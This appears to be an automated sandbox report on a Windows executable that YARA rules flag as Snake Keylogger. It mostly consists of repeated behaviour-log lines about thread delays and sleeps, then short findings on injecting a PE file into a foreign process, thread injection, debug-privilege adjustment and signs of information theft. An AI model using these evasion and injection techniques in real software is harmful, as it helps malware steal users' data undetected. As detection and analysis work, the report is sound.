            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeMemory allocated: 12E0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeMemory allocated: 1BF40000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeMemory allocated: 1240000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeMemory allocated: 1BA40000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 599889Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 599671Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 599453Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 599343Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 599232Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 599009Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 598904Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 598796Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 598687Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 598578Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 598468Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 598359Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 598250Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 598140Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 598031Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 597921Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 597812Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 597703Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 597593Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 597484Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 597374Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 597265Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 597156Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 597046Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 596937Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 596828Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 596718Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 596609Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 596499Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 596390Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 596281Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 596171Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 596062Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 595953Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 595843Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 595734Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 595625Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 595515Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 595405Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 595296Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 595187Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 595076Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 594968Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 594859Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 594749Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 594640Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 594531Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeWindow / User API: threadDelayed 2042Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeWindow / User API: threadDelayed 7821Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 3660Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480Thread sleep time: -24903104499507879s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480Thread sleep time: -599889s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 3148Thread sleep count: 2042 > 30Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480Thread sleep time: -599781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 3148Thread sleep count: 7821 > 30Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480Thread sleep time: -599671s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480Thread sleep time: -599562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480Thread sleep time: -599453s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480Thread sleep time: -599343s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480Thread sleep time: -599232s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480Thread sleep time: -599009s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480Thread sleep time: -598904s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480Thread sleep time: -598796s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480Thread sleep time: -598687s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480Thread sleep time: -598578s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480Thread sleep time: -598468s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480Thread sleep time: -598359s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480Thread sleep time: -598250s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480Thread sleep time: -598140s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480Thread sleep time: -598031s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480Thread sleep time: -597921s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480Thread sleep time: -597812s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480Thread sleep time: -597703s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480Thread sleep time: -597593s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480Thread sleep time: -597484s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480Thread sleep time: -597374s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480Thread sleep time: -597265s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480Thread sleep time: -597156s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480Thread sleep time: -597046s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480Thread sleep time: -596937s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480Thread sleep time: -596828s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480Thread sleep time: -596718s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480Thread sleep time: -596609s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480Thread sleep time: -596499s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480Thread sleep time: -596390s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480Thread sleep time: -596281s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480Thread sleep time: -596171s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480Thread sleep time: -596062s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480Thread sleep time: -595953s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480Thread sleep time: -595843s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480Thread sleep time: -595734s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480Thread sleep time: -595625s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480Thread sleep time: -595515s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480Thread sleep time: -595405s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480Thread sleep time: -595296s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480Thread sleep time: -595187s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480Thread sleep time: -595076s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480Thread sleep time: -594968s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480Thread sleep time: -594859s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480Thread sleep time: -594749s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480Thread sleep time: -594640s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480Thread sleep time: -594531s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 599889Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 599671Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 599453Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 599343Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 599232Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 599009Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 598904Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 598796Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 598687Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 598578Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 598468Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 598359Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 598250Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 598140Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 598031Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 597921Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 597812Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 597703Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 597593Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 597484Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 597374Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 597265Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 597156Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 597046Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 596937Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 596828Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 596718Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 596609Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 596499Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 596390Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 596281Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 596171Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 596062Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 595953Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 595843Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 595734Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 595625Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 595515Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 595405Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 595296Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 595187Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 595076Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 594968Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 594859Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 594749Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 594640Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread delayed: delay time: 594531Jump to behavior
            Source: rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498268759.0000000001358000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeMemory written: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe base: 140000000 value starts with: 4D5AJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeThread register set: target process: 4304Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess created: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeQueries volume information: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeQueries volume information: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected Snake Keylogger
            Source: Yara matchFile source: 0.2.rp8s2rxD5lpuQAG.exe.14219b18.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.rp8s2rxD5lpuQAG.exe.140000000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.rp8s2rxD5lpuQAG.exe.141f94d8.9.unpack, type: UNPACKEDPE
